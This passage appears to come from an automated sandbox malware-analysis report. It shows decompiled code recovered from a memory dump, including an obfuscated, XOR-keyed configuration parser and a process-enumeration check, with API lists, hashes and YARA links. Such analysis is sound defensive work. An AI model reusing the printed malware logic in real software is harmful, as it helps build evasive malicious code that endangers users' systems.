				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E04CD63F5(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x4cdd270, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E04CD1E47(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}








                                                                                                                          0x04cd4b28
                                                                                                                          0x04cd4b30
                                                                                                                          0x04cd4b47
                                                                                                                          0x04cd4b62
                                                                                                                          0x04cd4b66
                                                                                                                          0x04cd4b6b
                                                                                                                          0x04cd4b6d
                                                                                                                          0x04cd4b7f
                                                                                                                          0x04cd4b8b
                                                                                                                          0x04cd4b6f
                                                                                                                          0x04cd4b6f
                                                                                                                          0x04cd4b74
                                                                                                                          0x04cd4b79
                                                                                                                          0x04cd4b79
                                                                                                                          0x04cd4b6d
                                                                                                                          0x04cd4b91
                                                                                                                          0x04cd4b95
                                                                                                                          0x04cd4b95
                                                                                                                          0x04cd4b3c
                                                                                                                          0x04cd4b41
                                                                                                                          0x04cd4b45
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 04CD1E47: SysFreeString.OLEAUT32(00000000), ref: 04CD1EAA
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,73BCF710,?,00000000,?,00000000,?,04CD506B,?,004F0053,058B9370,00000000,?), ref: 04CD4B8B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Free$HeapString
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3806048269-0
                                                                                                                          • Opcode ID: 24ab9cca5c4ffaa768aa7082a7955bbc0b594f377cbaa68be1fdda7de68fc1d3
                                                                                                                          • Instruction ID: 6231faab5289161afebf6d10ed18ffaec8645e74efc1de65aa82d8cc722d552a
                                                                                                                          • Opcode Fuzzy Hash: 24ab9cca5c4ffaa768aa7082a7955bbc0b594f377cbaa68be1fdda7de68fc1d3
                                                                                                                          • Instruction Fuzzy Hash: A3011232501A59BBDF269F54CC05FEE7B66EF18790F048029FF099A520D731E960EB94
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          Function 04CD4C40, Relevance: 12.3, APIs: 8, Instructions: 258memoryCOMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E04CD4C40(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t103;
				intOrPtr _t121;

				_t104 = __ecx;
				_t28 =  *0x4cdd2dc; // 0x69b25f44
				if(E04CD5657( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0x4cdd310 = _v8;
				}
				_t33 =  *0x4cdd2dc; // 0x69b25f44
				if(E04CD5657( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x4cdd2dc; // 0x69b25f44
				if(E04CD5657( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0x4cdd270, 0, _v16);
					goto L69;
				} else {
					_t103 = _v12;
					if(_t103 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x4cdd2dc; // 0x69b25f44
						_t45 = E04CD3BB8(_t104, _t103, _t98 ^ 0x7895433b);
					}
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x4cdd278 = _v8;
						}
					}
					if(_t103 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x4cdd2dc; // 0x69b25f44
						_t46 = E04CD3BB8(_t104, _t103, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x4cdd27c = _v8;
						}
					}
					if(_t103 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x4cdd2dc; // 0x69b25f44
						_t47 = E04CD3BB8(_t104, _t103, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x4cdd280 = _v8;
						}
					}
					if(_t103 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x4cdd2dc; // 0x69b25f44
						_t48 = E04CD3BB8(_t104, _t103, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x4cdd004 = _v8;
						}
					}
					if(_t103 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x4cdd2dc; // 0x69b25f44
						_t49 = E04CD3BB8(_t104, _t103, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x4cdd02c = _v8;
						}
					}
					if(_t103 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x4cdd2dc; // 0x69b25f44
						_t50 = E04CD3BB8(_t104, _t103, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x4cdd284 = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t103 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x4cdd2dc; // 0x69b25f44
								_t51 = E04CD3BB8(_t104, _t103, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E04CD49B8(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E04CD4B98();
								}
							}
							if(_t103 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x4cdd2dc; // 0x69b25f44
								_t52 = E04CD3BB8(_t104, _t103, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E04CD49B8(0, _t52) != 0) {
								_t121 =  *0x4cdd364; // 0x58b95b0
								E04CD9311(_t121 + 4, _t68);
							}
							if(_t103 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x4cdd2dc; // 0x69b25f44
								_t53 = E04CD3BB8(_t104, _t103, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x4cdd2e0; // 0xbda5a8
								_t22 = _t54 + 0x4cde252; // 0x616d692f
								 *0x4cdd30c = _t22;
								goto L60;
							} else {
								_t64 = E04CD49B8(0, _t53);
								 *0x4cdd30c = _t64;
								if(_t64 != 0) {
									L60:
									if(_t103 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x4cdd2dc; // 0x69b25f44
										_t56 = E04CD3BB8(_t104, _t103, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0x4cdd2e0; // 0xbda5a8
										_t23 = _t57 + 0x4cde79a; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E04CD49B8(0, _t56);
									}
									 *0x4cdd380 = _t58;
									HeapFree( *0x4cdd270, 0, _t103);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}






































                                                                                                                          0x04cd4c40
                                                                                                                          0x04cd4c43
                                                                                                                          0x04cd4c63
                                                                                                                          0x04cd4c71
                                                                                                                          0x04cd4c71
                                                                                                                          0x04cd4c76
                                                                                                                          0x04cd4c90
                                                                                                                          0x04cd4ef8
                                                                                                                          0x04cd4eff
                                                                                                                          0x04cd4f06
                                                                                                                          0x04cd4f06
                                                                                                                          0x04cd4c96
                                                                                                                          0x04cd4cb2
                                                                                                                          0x04cd4ee6
                                                                                                                          0x04cd4ef0
                                                                                                                          0x00000000
                                                                                                                          0x04cd4cb8
                                                                                                                          0x04cd4cb8
                                                                                                                          0x04cd4cbd
                                                                                                                          0x04cd4cd3
                                                                                                                          0x04cd4cbf
                                                                                                                          0x04cd4cbf
                                                                                                                          0x04cd4ccc
                                                                                                                          0x04cd4ccc
                                                                                                                          0x04cd4cdd
                                                                                                                          0x04cd4cdf
                                                                                                                          0x04cd4ce9
                                                                                                                          0x04cd4cee
                                                                                                                          0x04cd4cee
                                                                                                                          0x04cd4ce9
                                                                                                                          0x04cd4cf5
                                                                                                                          0x04cd4d0b
                                                                                                                          0x04cd4cf7
                                                                                                                          0x04cd4cf7
                                                                                                                          0x04cd4d04
                                                                                                                          0x04cd4d04
                                                                                                                          0x04cd4d0f
                                                                                                                          0x04cd4d11
                                                                                                                          0x04cd4d1b
                                                                                                                          0x04cd4d20
                                                                                                                          0x04cd4d20
                                                                                                                          0x04cd4d1b
                                                                                                                          0x04cd4d27
                                                                                                                          0x04cd4d3d
                                                                                                                          0x04cd4d29
                                                                                                                          0x04cd4d29
                                                                                                                          0x04cd4d36
                                                                                                                          0x04cd4d36
                                                                                                                          0x04cd4d41
                                                                                                                          0x04cd4d43
                                                                                                                          0x04cd4d4d
                                                                                                                          0x04cd4d52
                                                                                                                          0x04cd4d52
                                                                                                                          0x04cd4d4d
                                                                                                                          0x04cd4d59
                                                                                                                          0x04cd4d6f
                                                                                                                          0x04cd4d5b
                                                                                                                          0x04cd4d5b
                                                                                                                          0x04cd4d68
                                                                                                                          0x04cd4d68
                                                                                                                          0x04cd4d73
                                                                                                                          0x04cd4d75
                                                                                                                          0x04cd4d7f
                                                                                                                          0x04cd4d84
                                                                                                                          0x04cd4d84
                                                                                                                          0x04cd4d7f
                                                                                                                          0x04cd4d8b
                                                                                                                          0x04cd4da1
                                                                                                                          0x04cd4d8d
                                                                                                                          0x04cd4d8d
                                                                                                                          0x04cd4d9a
                                                                                                                          0x04cd4d9a
                                                                                                                          0x04cd4da5
                                                                                                                          0x04cd4da7
                                                                                                                          0x04cd4db1
                                                                                                                          0x04cd4db6
                                                                                                                          0x04cd4db6
                                                                                                                          0x04cd4db1
                                                                                                                          0x04cd4dbd
                                                                                                                          0x04cd4dd3
                                                                                                                          0x04cd4dbf
                                                                                                                          0x04cd4dbf
                                                                                                                          0x04cd4dcc
                                                                                                                          0x04cd4dcc
                                                                                                                          0x04cd4dd7
                                                                                                                          0x04cd4dea
                                                                                                                          0x04cd4dea
                                                                                                                          0x00000000
                                                                                                                          0x04cd4dd9
                                                                                                                          0x04cd4dd9
                                                                                                                          0x04cd4de3
                                                                                                                          0x00000000
                                                                                                                          0x04cd4df4
                                                                                                                          0x04cd4df4
                                                                                                                          0x04cd4df6
                                                                                                                          0x04cd4e0c
                                                                                                                          0x04cd4df8
                                                                                                                          0x04cd4df8
                                                                                                                          0x04cd4e05
                                                                                                                          0x04cd4e05
                                                                                                                          0x04cd4e10
                                                                                                                          0x04cd4e12
                                                                                                                          0x04cd4e15
                                                                                                                          0x04cd4e16
                                                                                                                          0x04cd4e1d
                                                                                                                          0x04cd4e1f
                                                                                                                          0x04cd4e20
                                                                                                                          0x04cd4e20
                                                                                                                          0x04cd4e1d
                                                                                                                          0x04cd4e27
                                                                                                                          0x04cd4e3d
                                                                                                                          0x04cd4e29
                                                                                                                          0x04cd4e29
                                                                                                                          0x04cd4e36
                                                                                                                          0x04cd4e36
                                                                                                                          0x04cd4e41
                                                                                                                          0x04cd4e4f
                                                                                                                          0x04cd4e59
                                                                                                                          0x04cd4e59
                                                                                                                          0x04cd4e60
                                                                                                                          0x04cd4e76
                                                                                                                          0x04cd4e62
                                                                                                                          0x04cd4e62
                                                                                                                          0x04cd4e6f
                                                                                                                          0x04cd4e6f
                                                                                                                          0x04cd4e7a
                                                                                                                          0x04cd4e8d
                                                                                                                          0x04cd4e8d
                                                                                                                          0x04cd4e92
                                                                                                                          0x04cd4e98
                                                                                                                          0x00000000
                                                                                                                          0x04cd4e7c
                                                                                                                          0x04cd4e7f
                                                                                                                          0x04cd4e84
                                                                                                                          0x04cd4e8b
                                                                                                                          0x04cd4e9d
                                                                                                                          0x04cd4e9f
                                                                                                                          0x04cd4eb5
                                                                                                                          0x04cd4ea1
                                                                                                                          0x04cd4ea1
                                                                                                                          0x04cd4eae
                                                                                                                          0x04cd4eae
                                                                                                                          0x04cd4eb9
                                                                                                                          0x04cd4ec5
                                                                                                                          0x04cd4eca
                                                                                                                          0x04cd4eca
                                                                                                                          0x04cd4ebb
                                                                                                                          0x04cd4ebe
                                                                                                                          0x04cd4ebe
                                                                                                                          0x04cd4ed8
                                                                                                                          0x04cd4edd
                                                                                                                          0x04cd4ee3
                                                                                                                          0x00000000
                                                                                                                          0x04cd4ee3
                                                                                                                          0x00000000
                                                                                                                          0x04cd4e8b
                                                                                                                          0x04cd4e7a
                                                                                                                          0x04cd4de3
                                                                                                                          0x04cd4dd7

                                                                                                                          APIs
                                                                                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04CD5390,?,69B25F44,?,04CD5390,69B25F44,?,04CD5390,69B25F44,00000005,04CDD00C,00000008), ref: 04CD4CE5
                                                                                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04CD5390,?,69B25F44,?,04CD5390,69B25F44,?,04CD5390,69B25F44,00000005,04CDD00C,00000008), ref: 04CD4D17
                                                                                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04CD5390,?,69B25F44,?,04CD5390,69B25F44,?,04CD5390,69B25F44,00000005,04CDD00C,00000008), ref: 04CD4D49
                                                                                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04CD5390,?,69B25F44,?,04CD5390,69B25F44,?,04CD5390,69B25F44,00000005,04CDD00C,00000008), ref: 04CD4D7B
                                                                                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04CD5390,?,69B25F44,?,04CD5390,69B25F44,?,04CD5390,69B25F44,00000005,04CDD00C,00000008), ref: 04CD4DAD
                                                                                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04CD5390,?,69B25F44,?,04CD5390,69B25F44,?,04CD5390,69B25F44,00000005,04CDD00C,00000008), ref: 04CD4DDF
                                                                                                                          • HeapFree.KERNEL32(00000000,04CD5390,04CD5390,?,69B25F44,?,04CD5390,69B25F44,?,04CD5390,69B25F44,00000005,04CDD00C,00000008,?,04CD5390), ref: 04CD4EDD
                                                                                                                          • HeapFree.KERNEL32(00000000,?,04CD5390,?,69B25F44,?,04CD5390,69B25F44,?,04CD5390,69B25F44,00000005,04CDD00C,00000008,?,04CD5390), ref: 04CD4EF0
                                                                                                                            • Part of subcall function 04CD49B8: lstrlen.KERNEL32(69B25F44,00000000,7656D3B0,04CD5390,04CD4EC3,00000000,04CD5390,?,69B25F44,?,04CD5390,69B25F44,?,04CD5390,69B25F44,00000005), ref: 04CD49C1
                                                                                                                            • Part of subcall function 04CD49B8: memcpy.NTDLL(00000000,?,00000000,00000001,?,04CD5390), ref: 04CD49E4
                                                                                                                            • Part of subcall function 04CD49B8: memset.NTDLL ref: 04CD49F3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHeap$lstrlenmemcpymemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3442150357-0
                                                                                                                          • Opcode ID: 9e62ce5e25eb72a7065a2f820368e5ced95f7af525deb1e59d756470082bcbe2
                                                                                                                          • Instruction ID: ddd5b435ca30669ce38551a06165d9fc2a4a557c97a676fa500022c26bcf3287
                                                                                                                          • Opcode Fuzzy Hash: 9e62ce5e25eb72a7065a2f820368e5ced95f7af525deb1e59d756470082bcbe2
                                                                                                                          • Instruction Fuzzy Hash: C6818374A01644BEDB14EFB4CE84D6BB7FBEB487007284965A703D7104EA35FE409B64
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E33E84C, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 85COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,j3n,00000002,00000000,?,?,?,6E33EB6A,?,00000000), ref: 6E33E8E5
                                                                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,j3n,00000002,00000000,?,?,?,6E33EB6A,?,00000000), ref: 6E33E90E
                                                                                                                          • GetACP.KERNEL32(?,?,6E33EB6A,?,00000000), ref: 6E33E923
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: InfoLocale
                                                                                                                          • String ID: ACP$OCP$j3n
                                                                                                                          • API String ID: 2299586839-873717512
                                                                                                                          • Opcode ID: 7d1e1cd62d4062a7df91a4d735e80c6ac72ab922e6a5d314a8c008c26ee852c3
                                                                                                                          • Instruction ID: dd5cc24ca46b0ec31309cf6b682a2c846e1443720e4c8b4881d6f976a33c679b
                                                                                                                          • Opcode Fuzzy Hash: 7d1e1cd62d4062a7df91a4d735e80c6ac72ab922e6a5d314a8c008c26ee852c3
                                                                                                                          • Instruction Fuzzy Hash: 5821E226E043A5EAE7A48BEBC901F9B77ABAF45F50B628420E905DF504E733DD40C390
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E33E0A2, Relevance: 7.8, APIs: 5, Instructions: 251COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E32F299: GetLastError.KERNEL32(00000000,00000000,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000,00000004), ref: 6E32F29E
                                                                                                                            • Part of subcall function 6E32F299: SetLastError.KERNEL32(00000000,6E37A1A0,000000FF,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000), ref: 6E32F33C
                                                                                                                          • GetACP.KERNEL32(?,?,?,?,?,?,6E3325B5,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 6E33E163
                                                                                                                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6E3325B5,?,?,?,00000055,?,-00000050,?,?), ref: 6E33E18E
                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 6E33E222
                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 6E33E230
                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6E33E2F1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4147378913-0
                                                                                                                          • Opcode ID: 90e1432405cd92aa9c9e7d0a5b6c36d61da55a424b733a30f54be4847cb0fe27
                                                                                                                          • Instruction ID: d4111a5a416444278168e6b8cfc21d73982251dc2f7ef529f70c44144017b726
                                                                                                                          • Opcode Fuzzy Hash: 90e1432405cd92aa9c9e7d0a5b6c36d61da55a424b733a30f54be4847cb0fe27
                                                                                                                          • Instruction Fuzzy Hash: 66711871A00362AAEB65ABF6CC45FA773ACEF45314F30082AE555DB180EB71EC408B61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E33EA21, Relevance: 7.7, APIs: 5, Instructions: 183COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E32F299: GetLastError.KERNEL32(00000000,00000000,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000,00000004), ref: 6E32F29E
                                                                                                                            • Part of subcall function 6E32F299: SetLastError.KERNEL32(00000000,6E37A1A0,000000FF,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000), ref: 6E32F33C
                                                                                                                            • Part of subcall function 6E32F299: _free.LIBCMT ref: 6E32F2FB
                                                                                                                            • Part of subcall function 6E32F299: _free.LIBCMT ref: 6E32F331
                                                                                                                          • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6E33EB2D
                                                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 6E33EB76
                                                                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 6E33EB85
                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6E33EBCD
                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6E33EBEC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 949163717-0
                                                                                                                          • Opcode ID: 5b9609fdfdb29309dda328721904905794aa73cbe5b363baa38e552c1537ebe1
                                                                                                                          • Instruction ID: afe904202404c1a6e8cf5ed636a877968029fcc17d3d7c6afc9698b2e0a81371
                                                                                                                          • Opcode Fuzzy Hash: 5b9609fdfdb29309dda328721904905794aa73cbe5b363baa38e552c1537ebe1
                                                                                                                          • Instruction Fuzzy Hash: D7516E72A0436A9AEF51DFE6CC44EAE77BCBF05700F24046AE551EB180DB719D40CB61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD4A03, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 68%
                                                                                                                          			E04CD4A03() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x4cdd2e0; // 0xbda5a8
						_t2 = _t9 + 0x4cdee3c; // 0x73617661
						_push( &_v264);
						if( *0x4cdd110() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                                                                                                          0x04cd4a0e
                                                                                                                          0x04cd4a18
                                                                                                                          0x04cd4a1c
                                                                                                                          0x04cd4a26
                                                                                                                          0x04cd4a57
                                                                                                                          0x04cd4a2d
                                                                                                                          0x04cd4a32
                                                                                                                          0x04cd4a3f
                                                                                                                          0x04cd4a48
                                                                                                                          0x04cd4a5f
                                                                                                                          0x04cd4a4a
                                                                                                                          0x04cd4a52
                                                                                                                          0x00000000
                                                                                                                          0x04cd4a52
                                                                                                                          0x04cd4a60
                                                                                                                          0x04cd4a61
                                                                                                                          0x00000000
                                                                                                                          0x04cd4a61
                                                                                                                          0x00000000
                                                                                                                          0x04cd4a5b
                                                                                                                          0x04cd4a67
                                                                                                                          0x04cd4a6c

                                                                                                                          APIs
                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04CD4A13
                                                                                                                          • Process32First.KERNEL32(00000000,?), ref: 04CD4A26
                                                                                                                          • Process32Next.KERNEL32(00000000,?), ref: 04CD4A52
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 04CD4A61
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 420147892-0
                                                                                                                          • Opcode ID: 6f002ce38a442e17b2502b0e8b1ddec990adf4524608a9650e2461d6c264862c
                                                                                                                          • Instruction ID: df9465f1adbec8216795f32f70d49763e3bd31f1e2255592fc3cc052f9619426
                                                                                                                          • Opcode Fuzzy Hash: 6f002ce38a442e17b2502b0e8b1ddec990adf4524608a9650e2461d6c264862c
                                                                                                                          • Instruction Fuzzy Hash: B0F0BB356011246BD720AB669C49EEB76ADDBC5714F040172E75AD3000FA34FE45C7A9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E306CAF, Relevance: 77.3, APIs: 32, Strings: 12, Instructions: 287COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E306CB6
                                                                                                                          • collate.LIBCPMT ref: 6E306CBF
                                                                                                                            • Part of subcall function 6E3059D8: __EH_prolog3_GS.LIBCMT ref: 6E3059DF
                                                                                                                            • Part of subcall function 6E3059D8: __Getcoll.LIBCPMT ref: 6E305A43
                                                                                                                            • Part of subcall function 6E3059D8: std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E305A5F
                                                                                                                          • __Getcoll.LIBCPMT ref: 6E306D05
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306D19
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306D2E
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306D7F
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306EB4
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306EC7
                                                                                                                          • int.LIBCPMT ref: 6E306ED4
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306EE4
                                                                                                                          • int.LIBCPMT ref: 6E306EF1
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306F01
                                                                                                                          • int.LIBCPMT ref: 6E306F0E
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306F1E
                                                                                                                          • int.LIBCPMT ref: 6E306CDF
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • int.LIBCPMT ref: 6E306D42
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306D6C
                                                                                                                          • int.LIBCPMT ref: 6E306D97
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306DC5
                                                                                                                          • int.LIBCPMT ref: 6E306DD2
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306DF9
                                                                                                                          • int.LIBCPMT ref: 6E306E06
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306E56
                                                                                                                          • int.LIBCPMT ref: 6E306E63
                                                                                                                          • int.LIBCPMT ref: 6E306F36
                                                                                                                          • numpunct.LIBCPMT ref: 6E306F5D
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306F6D
                                                                                                                          • int.LIBCPMT ref: 6E306F7A
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306FB1
